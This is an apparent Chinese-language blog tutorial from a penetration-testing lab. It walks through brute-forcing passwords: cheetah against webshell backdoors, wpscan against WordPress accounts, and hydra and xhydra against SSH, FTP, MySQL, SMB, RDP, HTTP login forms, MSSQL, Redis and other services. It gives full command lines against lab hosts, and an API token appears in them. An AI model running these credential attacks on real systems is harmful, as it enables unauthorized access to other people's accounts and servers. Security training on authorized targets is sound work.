穷举


穷举篇

cheetah 对一句后门密码穷举

再kali上装上此工具

cheetah 是针对一句话后门的穷举工具

python cheetah.py -u http://orz/orz.php

python cheetah.py -u http://orz/orz.jsp -r post -n 1000 -v

python cheetah.py -u http://orz/orz.asp -r get -c -p data/pwd.list

python cheetah.py -u http://orz/orz -w aspx -s iis -n 1000

python cheetah.py -b url.list -c -p pwd1.list pwd2.list -v

cheetah.py -u http://www.c1moon.com/a.php -n 1000 -v -p data/pwd.list

cheetah.py -u http://www.c1moon.com/a.asp -n 1000 -v -p data/pwd.list

cheetah.py -u http://www.c1moon.com/a.aspx -n 1000 -v -p data/pwd.list

支持 asp php .net jsp 后门

-u 后门地址

-r 提交的方法 一般是 post

-n 一次提交密码的数量

-v 详细信息

-p 字典位置

image-20210802125301337

再文件夹位置运行终端执行

python cheetah.py -u http://www.c1moon.com/cmd.php -r post -n 1000 -v

image-20210802125631803

扫面结果再data里的find.list查看

image-20210802125843196

wordpress 博客系统用户密码穷举

wordpress 是知名的博客系统,在互联网上的占有量很大,所以一定要知道这套系统的弱口令穷举的方法。

https://wpscan.com 首先到这个网站注册账号和密码注册后获取 token

配置了kali的dns和host

自动找账号信息

wpscan –url http://www.redteam.com/ -e u -P /root/top100password.txt –api-token xvA9gb6k7XgLGYMkhu8YBsLUHwfpWRvllISDppfwYDE

image-20210802132104577

image-20210802132121759

手动收集 wordpress 用户信息 访问连接获取用户信息

http://www.redteam.com/wp-json/wp/v2/users

image-20210802132555565

这里实在物理机看的 没配dns解析 应该是admin和moonsec

获取信息可以再进行指定用户爆破

wpscan –url http://www.redteam.com/ -U moonsec -P /root/top100password.txt –api-token xvA9gb6k7XgLGYMkhu8YBsLUHwfpWRvllISDppfwYDE

image-20210802132844496

常见的端口服务穷举

hydra密码穷举工具的使用

hydra(九头蛇) 是一个端口穷举服务器的工具

可以扫描以下服务

adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post}http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s]ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

使用例子

hydra -l user -P passlist.txt ftp://192.168.0.1

hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN

hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5

hydra -l admin -p password ftp://[192.168.0.0/24]/

hydra -L logins.txt -P pws.txt -M targets.txt ssh

常用参数说明

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]

[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]

server service [OPT]

-R 继续从上一次进度接着破解

-S 大写,采用 SSL 链接

-s <PORT> 小写,可通过这个参数指定非默认端口

-l <LOGIN> 指定破解的用户,对特定用户破解

-L <FILE> 指定用户名字典

-p <PASS> 小写,指定密码破解,少用,一般是采用密码字典

-P <FILE> 大写,指定密码字典

-e<ns> 可选选项,n:空密码试探,s:使用指定用户和密码试探

-C <FILE> 使用冒号分割格式,例如“登录名:密码”来代替-L/-P 参数

-M <FILE> 指定目标列表文件一行一条

-o <FILE> 指定结果输出文件

-f 在使用-M 参数以后,找到第一对登录名或者密码的时候中止破解

-t <TASKS> 同时运行的线程数,默认为 16

-w <TIME> 设置最大超时的时间,单位秒,默认是 30s

-v / -V显示详细过程

server

目标 ip

service

指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等

OPT

可选项

hydra 穷举 ssh 服务

-L 用户字典文件 -P 密码字典文件 -t 线程数 -vV 详细信息 -e ns 使用空口令使用指定用户和密码试探 192.168.163.143 你要穷举的 ip ssh 是服务 -o 保存文件-f 如果找到马上中断扫描

我们可以使用nmap查看ssh对应的22端口是否开放

image-20210802184443404

我们使用如下的命令

hydra -l root -P /root/top100.txt -e ns -vV -t 1 -f 192.168.163.143 ssh

image-20210802184621404

设置了-f,所以跑到正确的密码就会停下来高亮

类似这种

image-20210802184820329

这是指定用户的,我们也可以编辑一个user.txt,扫描多个用户

我们再user.txt写上root和moonsec,用大写L即可

hydra -L user.txt -P /root/top100.txt -e ns -vV -t 1 -f 192.168.163.143 ssh

image-20210802185240140

hydra 穷举 ftp 服务

hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认 16) -vV

hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

我们可以看到靶机存在ftp服务,成功登录了

image-20210802185700425

用此命令穷举

hydra -l c5moon -P /root/top100.txt -e ns -vV 192.168.163.139 ftp

image-20210802185548817

hydra 穷举 mysql 服务

hydra ip mysql -l 用户名 -P 密码字典 -t 线程(默认 16) -vV

hydra ip mysql -l 用户名 -P 密码字典 -e ns -vV

hydra ip mysql -l 用户名 -P 密码字典 -e ns -vV -s 端口

在靶机上我们开了mysql

image-20210802190148824

hydra -l root -P /root/top100.txt -e ns -vV -f 192.168.0.127 mysql

image-20210802190206693

hydra 穷举 smb 服务

我们用nmap看下靶机445端口是否开放

nmap -p 445 192.168.0.127

image-20210802190524879

靶机上查看也是开放的

image-20210802190606146

单个穷举

hydra -l administrator -P /root/top100.txt -e ns -vV -f 192.168.0.127 smb

image-20210802190815658

我们可以通过此端口在物理机连接靶机

image-20210802191222878

批量穷举

我们俩个靶机都开放了445端口,我们来批量扫描

我们把俩个ip写在ip.txt里面,通过-M参数来穷举

image-20210802191653798

hydra -l administrator -P /root/top100.txt -e ns -vV -f -M ip.txt smb

image-20210802191827255

image-20210802191841714

可以通过-o参数把结果写在一个文件里

hydra -l administrator -P /root/top100.txt -e ns -vV -f -M ip.txt smb -o smb.txt

image-20210802191947897

hydra 穷举 rdp 服务

rdp远程终端,可以远征连接靶机

我们现在俩个靶机上看是否开放了rdp服务

image-20210802192236857

image-20210802192302683

hydra -l administrator -P /root/top100.txt -e ns -vV -f -M ip.txt rdp

image-20210802192647875

image-20210802192701423

我们可以通过账号远程连接靶机

image-20210802192726942

image-20210802192738422

image-20210802192817352

hydra穷举 http 服务

eg:

hydra -l admin -P 2019_top100.txt -vV -f www.c1moon.com http-post-form”/admin/index.php:user=^USER^&ps=^PASS^&action=login:login-error”

我们用如下命令穷举

hydra -l admin -P /root/top100.txt -vV -f www.c1moon.com http-post-form “/admin/index.php:user=^USER^&ps=^PASS^&action=login:login-error”

image-20210802193148396

hydra穷举mssql服务

mssql即sql server

使用如下命令

hydra -l sa -P /root/top100.txt -e ns -vV -f 192.168.0.127 mssql

image-20210802194209202

hydra穷举redis服务

俩个靶机都开放了redis,redis没有用户名,我们把l参数删掉即可

使用如下命令批量穷举

hydra -P /root/top100.txt -e ns -vV -f -M ip.txt redis

image-20210802194401230

hydra 穷举 pop3 服务

hydra -L user.txt -P qweasd123 192.168.52.6 smtp-vV -f

hydra 穷举 http-proxy 服务

hydra -l admin -P pass.txt http-proxy://10.36.16.18

hydra 穷举 imap 服务

hydra -L user.txt -p secret 10.36.16.18 imap PLAIN

hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

hydra 穷举 telnet 服务

hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V

xhydra穷举工具

xhydra 是 hydra 的可视化工具 使用简单方便快捷。kali终端输入 xhydra 即可使用。

基本界面如下

image-20210802195823344

image-20210802195908440

image-20210802195942339

image-20210802200041383

image-20210802200051810

我们尝试穷举rdp服务如下:

image-20210802195703423

image-20210802200138453


文章作者: 晓莎K
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 晓莎K !
评论
  目录